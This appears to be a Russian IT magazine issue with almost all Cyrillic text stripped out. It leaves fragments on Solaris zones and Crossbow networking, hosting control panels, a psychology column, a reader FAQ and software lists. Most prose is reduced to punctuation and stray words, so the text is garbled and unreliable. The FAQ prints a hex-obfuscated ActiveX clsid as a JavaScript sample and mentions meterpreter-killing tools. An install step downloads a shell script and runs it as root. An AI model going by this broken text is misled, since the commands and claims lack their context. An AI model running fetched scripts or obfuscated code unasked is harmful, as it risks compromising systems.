zonecfg:myzone:fs> set special=/dev/dsk/c0t0d0s7
zonecfg:myzone:fs> set raw=/dev/rdsk/c0t0d0s7
zonecfg:myzone:fs> set type=ufs
zonecfg:myzone:fs> end

3. swap- (100 ):


zoneadm
:
# zoneadm list -v
:
# zlogin myzone shutdown
:
# zoneadm -z myzone boot

, Crossbow
zonecfg:myzone> add capped-memory
zonecfg:myzone:capped-memory> set physical=100m
zonecfg:myzone:capped-memory> set swap=100m
zonecfg:myzone:capped-memory> end

4. 50% :
zonecfg:myzone> add capped-cpu
zonecfg:myzone:capped-cpu> set ncpus=.50
zonecfg:myzone:capped-cpu> end

5. Linux-:
zonecfg:linux> create -t SUNWlx
zonecfg:linux> set zonepath=/zones/linux
zonecfg:linux> set autoboot=true
zonecfg:linux> verify
zonecfg:linux> commit
zonecfg:linux> exit

6. :
zonecfg:myzone> set limitpriv="default,sys_time"
zonecfg:myzone> exit

, (default),
( PRIV_SYS_TIME,
limitpriv sys_time).
man- privileges(5). Apache.
Installed,
.
zoneadm -z apache install, ,
, Apache , .
'-e', ,
. AMP (Apache, MySQL, PHP):
# zoneadm -z apache install -e amp

:
# zoneadm -z myzone reboot
:
# zlogin zone1 shutdown
# zoneadm -z zone1 uninstall -F
:
# zlogin zone1 shutdown
# zoneadm -z zone1 uninstall -F
# zonecfg -z zone1 delete -F


,
( /usr ,
),
AMP.
,
. , upgrade
,
.


INFO

info
Solaris Crossbow
,
10 8/07.

: OpenVZ/
Virtuozzo, LinuxVServer, FreeBSD
Jail, FreeVPS, Icore
virtual accounts AIX
Workload Partitions.

,

zoneadm
-z - clone
-.


Ready, zoneadm:
# zoneadm -z apache boot

,
init, Running.
, :
# zoneadm list -v

,
zlogin:
# zlogin -C apache

,
,
Solaris ( ,
, ..)
Apache MySQL:
# svcadm enable network/http:apache22
# svcadm enable application/database/mysql:version_51


2009.06, OpenSolaris
Project Crossbow,

.
:

HTTP://WWW
links
www.sunhelp.ru/archives/141Podnimaem_Debian_Etch_v_BrandZ.html
Debian
Etch BrandZ.
wikis.sun.com/display/BigAdmin/Solaris+Containers
Solaris 8/9
.


(VNIC),
.
IP- (IP instances)
, .


VNIC-.

,

(
VNIC),
. ,
.

, -
.
,



.
,
, ,
.
Crossbow, ,

TCP/IP-.
? -, ,
,
. dladm (Data Link Administration):
# dladm create-etherstub etherstub0

:
Apache. ,
:
# dladm create-vnic -l etherstub0 host1
# dladm create-vnic -l etherstub0 apache1


ifconfig:
# ifconfig host1 plumb
# ifconfig host1 inet 192.168.0.1 up

Apache
. ,
,
:
zonecfg:apache> add net
zonecfg:apache:net> set address=192.168.0.2/24
zonecfg:apache:net> set physical=apache1
zonecfg:apache:net> end

zlogin
(Router IP Address) IP-
host1, 192.168.0.1.
Apache , Apache
. ,
NAT.
:
# routeadm -u -e ipv4-forwarding

ipnat /etc/ipf/
ipnat.conf :
map pcn0 192.168.0.0/24 -> 0/32 portmap tcp/udp auto
map pcn0 192.168.0.0/24 -> 0/32

Solaris

pass in quick all
pass out quick all

NAT:
# svcadm enable network/ipfilter

/etc/ipf/ipf.conf , .
:

Apache

Apache - , - . ,
Apache
/httpd/src :
# mkdir -p /zones/apache/root/httpd/src
# cd /zones/apache/root/httpd/src
# wget www.sai.msu.su/apache/httpd/httpd-2.2.15.tar.bz2
zlogin:
# zlogin -C apache
/usr
, ,
/httpd
Apache:
# cd /httpd/src
# tar xjf httpd-2.2.15.tar.bz2
# cd httpd-2.2.15
# ./configure --prefix=/httpd --enable-so \
--enable-mods-shared=all
# make install
:
# /httpd/bin/apachectl start

. ,
( ) . , Apache , . , flowadm.
flowadm ,
.
QoS,
( /,

).
HTTP- httpflow:
# flowadm add-flow -l pcn0 \
-a transport=tcp,local_port=80 httpflow

, ,
() / QoS. ,
httpflow,
8 /, :
# flowadm set-flowprop -p maxbw=8M,priority=high httpflow

:
* maxbw
.
* priority ,
low, normal, high rt ( ).
* cpus (
OpenSolaris ).

, Solaris ,
.
Crossbow ,
, . z


SYN/ACK
grinder grinder@synack.ru


-
: , . , .
, .
,
.
SYSCP
-, OpenSource-,
, SysCP (System Control Panels, syscp.org)
, , .
: , SysCP,
, ,
,
. ,
, ,
SysCP. 2004 ,
.
SysCP.
: () ,
BIND,
. PHP,
MySQL,
.
SysCP .
:
(Apache, Lighttpd), DNS (BIND9, PowerDNS), SMTP (Postfix, Exim4),
POP3/IMAP (Courier, Dovecot), FTP (ProFTPd, Pure-ftpd),
. . : Maildrop, ClamAV
Spamassassin, PHPmyAdmin, Roundcube, SquirrelMail, WebFTP ..
,
SysCP *nix.
Debian/Ubuntu FreeBSD. Gentoo Linux openSUSE. SysCP
,
RedHat.
,
: ,
.
- , ,
, .
SysCP , ,


,
. , , .
webmail phpMyAdmin, , , ,
, ,
. Catch-all
, . ,
: ,
. , , .
SysCP ,
demo.syscp.org, , , -.
, SysCP,
Linux, . , Ubuntu/Debian:
$ sudo apt-get install syscp

, ,
, , .
(, , FTP-c
..) , , , .
,
.
,
,
LAMP. , ,
.

ISPMANAGER
ISPmanager (ispsystem.com/software/ispmanager) . , ,
-.
. - , . , ,
, :

Lite, Pro Cluster. : FreeBSD, Linux,


Windows ( Lite-). ISPmanager Solaris. Linux, ,
, Debian ( Cluster
Debian) CentOS.

ISPmanager .
,
. :
,
, . CentOS
SELinux.
Lite ( ), , VDS,
,
, .
:
- (Apache, IIS), (MySQL, PostgreSQL), (Sendmail, Exim, Postfix CommunigatePro), POP3
(Dovecot), FTP- (ProFTPD, vsftpd), DNS- (BIND9 DNS
Windows). -
SquirrelMail, AwStats
Webalizer, phpMyAdmin phpPgAdmin. Minimalist MailMan,
.
, dnsbl.
, , ,
.
: , ( Pro Cluster), , FTP
, .
Lite Pro,
. ,
,
, . , Google Chrome
.

, Windows exe'.
, -
. , IP,
.

:
$ wget -c http://download.ispsystem.com/install.sh

:
$ sudo sh install.sh

.

. , ,
Ubuntu 10.4, /etc/apt/sources.list Debian,
.
ISPmanager.
, APT. /etc/apt/sources.list .
, :
Install most popular software ;
Minimal install (includes web server only) - Apache,
ISPmanager;
Install all supported software (default for anything)
,
MySQL PostgreSQL;
Gives you a choice of software
,
.
https://IP-/manager/
.
, ,
. , ,
.
, ,
.
.
, .
.

,
-.


Baifox

DTC

DTC
- Domain Technologie Control
, DNS, FTP ,
VDS. , , . ,
, IP ( DynDNS.com),
- (Amavis, Clamav, SpamAssassin), NS MX ,
, . -

-,
FTP-, , SSH MySQL, . DTC PHP,
MySQL,
.
-.
: Bind 8/9,
MySQL, Apache ( mod_security), PHP, Qmail, Postfix, Courier,
Cyrus, Dovecot, ProFTPd, Pure-ftpd, NCFTP (upload), Webalizer, Awstat,
Xen .
: root-admin, virtual admin, (
). ,
, virtual admin.
: 128 256 swap. , ,
( ), ,
6 700 .
, .

: FreeBSD, RedHat, Debian, Gentoo Mac OS X.
DTC -, .
, Debian/Ubuntu
CentOS . Ubuntu, /etc/apt/sources.list: deb ftp://ftp.gplhost.com/debian/ lenny main.
dtc 12 .

DTC
CentOS/RedHat

, DTC CentOS ,
Ubuntu. , .
CentOS dtc, , dtc.x86_64,
, Device Tree
Compiler. (DTC
RPMforge):
# wget -q ftp://ftparchive.gplhost.com/yum/gplhost.repo \
-O /etc/yum.repos.d/gplhost.repo
# wget http://dag.wieers.com/rpm/packages/rpmforge-release/rpmforge-release-0.3.6-1.el5.rf.x86_64.rpm

yum search dtc


, CentOS Xen. :
# rpm -ivh rpmforge-release-0.3.6-1.el5.rf.x86_64.rpm
# yum install dtc-postfix-courier

, :
# /usr/share/dtc/admin/install/install --not-interactive \
--centos-init-daemons --mysql-pass PASSWORD \
--dtcadmin-pass PASSWORD
# service httpd start
# service named start
# chkconfig named on

, .


-
VHCS

Virtual Hosting Control System (vhcs.net)


: , .

Apache, DNS,
FTP-, , SSL- .. (
), .
: Debian, Suse 9.3+, SLES 9+,
Fedora, CentOS 4+. : Apache + PHP, Postfix, POP3
IMAP-, ProFTPd, MySQL, BIND.
- 2.4.8.
Mozilla Public License.

.
,
dtc dtc-toaster,
- .
(dtc-core, dtc-cyrus, dtc-postfix-courier) . ,
,
, ,
DTC . ,
CentOS . : sudo apt-get
install dtc-toaster.
aptitude, , .
APT .
:
$ sudo nano /etc/apt/apt.conf.d/20norecommends
APT
{
Install-Recommends "false";
Install-Suggests "false";
};

DTC. /var/lib/dtc/
saved_install_config (
, ). , : sudo /usr/share/dtc/
admin/install/install.
,
, SSL-, .
:
MySQL, ,
- .
,
, .
DTC dtc. ,
synack.ru http://dtc.synack.ru/
dtcadmin https://dtc.synack.ru/dtcadmin.
, OC Linux, DTC ,
Git- . ,
, PHP.
-,
. ,
.

BAIFOX
, DTC,
. ,
, -
, , -. .
Baifox (baifox.org).
.
Baifox PHP ( PHP4 PHP5),
SQLite.
, ,
, Lighttpd,

INFO

info
- ispCP
,
][ 10.2008.

SysCP
Apache.
, .
, .
PHP,
cgi-bin, .. Baifox
BIND, Awstats, MySQL, PureFTPd VPOPmail.
,
, , .
. , ,
, .

. ,

.
Generate, ,
Restart service.
e-mail,

.
.
Debian/Ubuntu
baifox.org/?id=install_debian.
, . Apache2 Lighttpd ,
, ,
. Lighttpd,
. Lighttpd
7777, ,
( server.port). / admin/admin.
, ,
, .
,
, Baifox .

,
. ,
,
. ,
, , ,
. z

DVD
dvd


,
,

DTC
CentOS.

HTTP://WWW
links
SysCP syscp.org
ISPmanager ispsystem.com/software/ispmanager
DTC gplhost.com/software-dtc.html
Baifox baifox.org


UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:


, - . ; , , , - ;
, ? ?


. ,
, ,
:
,
,

. ;
,
, .

-
. , , .
, ,
- . ,
- ,
. , , .
.

10 ,
.
,
, ;


.
,
:
, ,
, .
:
?
, ()


. ?
() - , ,
, ?
()
?
, !!!
, !
? ,

,

. ,

.


in real life?

. .
, :
;
, . :
,
.
, ,
.
.
, ,
;
.
,

, .
: , ,
. , ,
:
, .
,
.
( .
)


, ,
, :
1. (,
, ,
);
2. , -
,
,
;
3. .
. , ,

.
,

:
1. .
- ,
:
, , ,
.
2. ,
, .
,

(
).
3. , ,

.

,
.
, .


, ,
() (, ) .

()
,
.
, , ,
, -
,
.


(insomnia) ;
, .
, , .
, ; ,
, , , , , . , .
, .
() , , , , ,
: , , .
, , -. ,
.
, ,
. .
, , - (. : ][ 05.2008). , ,
, ,
.


-

- , - ,
. : , ,
, , ,
. , ,
, , .
, , , .
:
1. , , ,
. ,
,
.
2. . : , ,
, , .
3. ,
. , .
4. , . , ,
, . ,
, -
.

.
,
,
.
, , ,

.
() ?
1. . .
2.

, ,
. ,
-

.
3. .
.
:
, , ,
.

-
. , ,
.


,
, .

, .
, :).


Google ,
.
, , ,
() .

,
,

. ,
,
.
, , . ,
,
.
,
. : , ,

(, ); ,

. - ,
,
( ).

.
,
.
,



().

:
. , ,
.
, ;

. , .
, , .
in real life,
, , ,
. , ,
.
?
,
.
,
?
,
, . -
, (
) -
. :
,
,
.
,
.
: , ,
,
.

INFO

info




,
][ 2009 .





,
?
.
.

. (!) ,
.

- -.
, : ) ; ) () ; )
,
. , .
:
,
.

.
,
; , . ,
,
, , ,
, . , ,
, - ,
.

: ?
, ,
, ,

,
,
. ,
, , .
.
, ,
( ),
, .
( ) ,
( )
.

,
,
.

, . ,
,
,
, ,
.
, ,

,
.
,
(
, ;


.

( ),
).

:
-
, ,
-
,

, .
,
.

,
, , .. ,
,
,
.
,
:
1. , ;
2. , ;
3. .
. ,
,
, , , ,
:


.
, , ;
3-4 .

;
.
, , ,
;
,
;

;
- 2-3
,
, , ,
,
.
,
, ,
.
, ,
.
:
. ?
, ,
, .
,
,
.
, , ,
-

,
.
, , , ,

,
. ,

,
, .
,
.

,
.
,
:
, ;
- ;
;

,
.

, ,
.
, : ,
. z


UNITS
ant

faq
united
@real.xakep.ru

Q:

Windows, ?

A: ,

. , ,
HDD,
. , , ,
,
. . ,
, ,
, .

Cipher.exe.
,

EFS (Encrypting File System),
/w.
,
. ,
,
.



,
Cipher.exe, /w : cipher /W:C:\Path\To\Folder.
Q: Skype

:
import Skype4Py
skype = Skype4Py.Skype()
skype.Attach()

( , ICQ). ,

. ?

A: Python,
.
Skype,
Skype4Py (skype4py.sourceforge.net/doc/html).

API- Skype, , ,
, , , .

, ,
- , , .
, Skype
. , ,

print 'Your full name:', \
    skype.CurrentUser.FullName
print 'Your contacts:'
for user in skype.Friends:
    print '    ', user.FullName

Q: Wi-Fi
?

A: ,
Wi-Fi
, .
, ,
( 1 11),
AP.

,
,
,
.

Wi-Fi , inSSIDer (www.metageek.net/products/


inssider), .
Q: , , IPv6. , .

. ,

( Scapy
IPv6 , , ).
: , - ?

A:
,
IPv6, -,
THC, security-.
THC-IPV6 (freeworld.thc.org/thcipv6), IPv6-
ICMP6-.
,
IPv6. ,
. ,

.
,
THC-IPV6

security- .
Q: ,
,
- ,
.

Android SDK
A: , . -,
,

.

:

A:
kanicq.ru/invisible.
:
1. . : Trillian
Miranda IM.
2. . ,
, QIP R&Q,
. ICQ 6 ,
,
- .
3. . UIN,
, ( !)
-.
Q: , , JavaScript-.
,

Firefox- JavaScript
Deobfuscator?

"clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"

"\x63\x6c\x73\x69\x64\x3a\x30\x39\x35\x35\x41\x43\x36\x32\x2d\x42\x46\x32\x45\x2d\x34\x43\x42\x41\x2d\x41\x32\x42\x39\x2d\x41\x36\x33\x46\x37\x37\x32\x44\x34\x36\x43\x46"

, ... . -,
,
,
.
,
.

, , ,
,
. .
Q:
. IDA,

JavaScript ,
/
.
,

. . , JSidle
(github.com/svent/jsidle)
,
. ?
,

.

exe?

A:
. ROM-
. ,
, IDA , .
IDA (Load a new file)
Binary file.
Intel 80x86 processors: metapc.

Loading segment Loading offset
. - ,


. ?
: Windows 7, Ubuntu 10.4
Hackintosh.


Zero Wine
,
. ,
(16 32
), IDA
.

,
Wi-Fi
,
.
Q: ,
Metasploit
, , ..
:

Q: , -

? ,

? :

A:
Antimeter (www.mertsarica.com/
codes/antimeter2.zip).
. :

A:
.
,
,

, .
Windows
( -> ). ,
,
Windows, . ,


-. ,
-,
.
Q: ,

t [ ]

( );
a
meterpreter (
);
d
meterpreter ( );
e .

. ,

Q: DOS'

CPU,

. , DOSBox' -


Q: -
, :
, . ,
?

A: ,

Zero Wine (zerowine.
sourceforge.net).
,
Windows- WINE , API-, .
, .
Q:
Android,

?

5
meterpreter: antimeter.exe -t 5 -a.

A: , Intel
32
AESNI (Intel Advanced Encryption Standard
Instructions).

, AES.

3-10
. ,
CPU ( Intel i5 i7), . TrueCrypt (www.truecrypt.org)
,
.

A: Ubuntu GRUB2 Ext4FS, ,


. , EasyBCD (neosmart.
net/blog). ,
,
:
Windows 7
;
, boot.ini
;
GRUB2
Ext4FS;
ISO- VHD- (
);
OS X;
EasyBCD BIOS Extender,
, USB,
.

A:
DOSBox', ScummVM
(www.scummvm.org).
:
,
iPhone, Maemo Symbian
S60/UIQ3,
Windows CE (, GPS-)
Samsung (2009 ).
Q: Ubuntu

. ,

A: Android'
,
Google (developer.android.com/
sdk/index.html). Java. SDK : Android 2.2
1.5. ,
(, 2.2).
SDK Android SDK
AVD Manager.
Android' (Android Virtual Device, AVD): New ,

Target Android'.
SD,
,
.

Start. Google,
. z

>Net
Calimero Skype Launcher 1.1
Dropbox 0.7.110

>Multimedia
1by1 1.70
Anki 1.0
calibre 0.7.12
FastStone Image Viewer 4.2
Freemake Video Converter 1.1.7
Hamster Free Video Converter
1.0.0.3
HandBrake 0.9.4
Image Resizer 2.1
ImgBurn 2.5.1.0
Mp3tag v2.46a
PDF-XChange Viewer 2.054
PDFCreator 1.0.1

>Misc
Bend 0.93
Desktop Manager BBox 2010
Dexpot 1.5.5
Dropbox Shell Tools 0.1.1
FileMenu Tools 5.8.1
Hidden Menu 2.2 R2
HostsMan 3.2.73
KeePass 2.12
My Lockbox 2.1
P2 eXplorer v2.1
PeaZip 3.2.1
Prey 0.4
Q-Dir 4.31
SuperCopier 2.2 Beta
Switch Off 3.3.2
The Windows 7 SBB Tool
UltraSearch 1.3
USBDeview v1.75
Visual Understanding Environment
(VUE) 3.0.2
WikiTaxi 1.3.0
WinOMeter
Workrave 1.9.1

>Games
Free Heroes2
Steam
Super Mario Bros. X 1.2.2

Flash:
Adobe Flash Builder 4
Box2DFlash 2.1a
FDT4
Flash Professional CS5
FlashDevelop 3.2.2 RTM

>System
AVZ 4.34
Comodo Programs
Manager 1.0
DriverBackup 2.1
EasyBCD 2.0.1
Panda Cloud Antivirus
Partition Wizard
Home Edition 5.0
Process Hacker 2.1
Revo Uninstaller
SpeedFan 4.4
ThreatFire AntiVirus Free Edition
4.7.0.17
WebTemp 3.31

>Secure
Deblaze 0.3
Fiddler 2.3.0.0
HstEx 3.5
IDAStealth Plugin
JavaSnoop 1.0RC4
Nikto 2.1.2
PlainSight 0.1
PROTECTiON iD v6.4.0
The Sleuth Kit (TSK) 3.1.3
Tizer Rootkit Razor
TrueCrypt 7.0
Vasto 0.2
WATOBO 0.9.2
Web Historian 2.0
WinTaylor 2.0

>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.3.1221
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.3
Firefox 3.6.8
foobar2000 v1.1 beta 1
K-Lite Mega Codec Pack 6.2.0
Miranda 0.8.27
Notepad++ 5.7
Opera 10.60
PuTTY 0.60
Skype 4.2
Sysinternals Suite ()
Total Commander 7.55
Unlocker 1.9.0
Xakep CD DataSaver 6.0
XnView 1.97.6

FeedDemon 3
freeFTPd 1.0.11
freeSSHd 1.2.6
LastPass 1.69.0
MDownloader 0.15
Mikogo 3.0
Pidgin 2.7.1
TCP Profiles Manager
The Dude 4.0.2beta
WinSCP 4.2.8
Wireshark 1.2.10

>Security
Adsuck 1.8
Andiparos 1.0

>Net
Gnubiff 2.2.13
I2P 0.8
Instantbird 0.2
Kstm 0.1
KVIrc 4.0.0
Lightspark 0.4.2
Mozilla Firefox 3.6.8
Mrdx 0.2
Nullfxp 2.0.2
Opera 10.60
Pidgin 2.7.2
ReKonq 0.5
Remmina 0.8
RSS-torrent 0.8
RTMDump 2.3
Transmission 2.03
Twitux 0.69

>Games
Frogatto 1.0

>Devel
BuGLe 0.0.20100718
CodeLite 2.6.0
CouchDB 1.0
Gcc 4.5.0
Git 1.7.2
Glom 1.14.4
KDevelop 4.0.1
libjpeg-turbo 1.0.0
Mono 2.6.7
MySQL-python 1.2.3
Php 5.3.3
Python 2.7
Redmine 1.0.0
Scala 2.8.0
SQLite 3.7.0
Tomcat 7.0.0
Twisted 10.1.0

>>UNIX
>Desktop
Cheese 2.30.1
Cortina 0.5.0
CScreenie 1.1
Cuneiform 1.0
GIMP 2.7.1
KeepNote 0.6.4
LuxRender 0.7
Me TV 1.3.1
Midnight Commander 4.7.3
Pinta 0.4
Ramen 0.6.1
Shotwell 0.6
Speakingface
Sweet Home 3D 2.5
Ventana3d 0.6.1
VLC 1.1.1
Wumwum 0.9
Yakuake 2.9.7

>X-distr
Mandriva 2010.1

>System
Cabextract 1.3
Compiz 0.9.0
Ddrescue 1.12
FreeType 2.4.0
Fuse-ExFAT 0.9.1
Linux Kernel 2.6.34.1
Muon 0.2
QEMU 0.12.5
ROXTerm 1.18.5
Rsyslog 5.5.6
Sudo 1.7.3
Tiny Core 3.0
Wine 1.2

>Server
Apache 2.2.16
Asterisk 1.6.2.10
BIND 9.7.1
Courier-imap 4.8.0
CUPS 1.4.4
DHCP 4.2.0
Monkeyd 0.11.0
MySQL 5.1.48
OpenLDAP 2.4.23
OpenSSH 5.5
OpenVPN 2.1.1
Postfix 2.7.1
PostgreSQL 8.4.4
ProFTPD 1.3.3
Samba 3.5.4
Sendmail 8.14.4
Siege 2.70
Squid 3.1.5
Vsftpd 2.2.2
Ziproxy 3.1.3

Gnupg 2.0.16
GnuTLS 2.10.0
Inundator 0.5
Metasploit framework 3.4.1
nwmap 0.1
Packetfence 1.9.0
PHPJackal
Remnux 1.0
Sagan 0.1.3
Skipfish 1.52b
Suricata 1.0.0
TrueCrypt 7.0
w3af 1.0
Watobo 0.9.2
Webenum 0.1
WhatWeb 0.4.4

>>WINDOWS
>Development
mongoDB 1.4.4
Erlang R14A
HiAsm 4.4
mono 2.6.7
Python 3.2 alpha 1
SQLiteSpy 1.8.14
WinMerge 2.12.4

UNITS

HTTP:// WWW2

Ruby

CLOUDSHARK

TRYRUBY!

CloudShark? :
Wireshark, -.
, ,
, Wireshark
. PCAP- ,
,

. , HTTP-,
-
.

15 ?
Ruby, - ( Twitter) security- (, MetaSploit). TryRuby!
,
, . ,
TryRuby .

. ,
.. , Python
www.trypython.org.

www.cloudshark.org

SIP-

TALKPAD

www.talkpad.ru
, , Skype ,
talkpad. , IP-, .
;
(Firefox, Internet
Explorer, Google Chrome, Opera). . ,
10 ,
20 :).


www.tryruby.org

STACKOVERFLOW

www.stackoverflow.com
,
, .
,
, advanced- .
, , , . , , ,
. ,
.
, . ,
.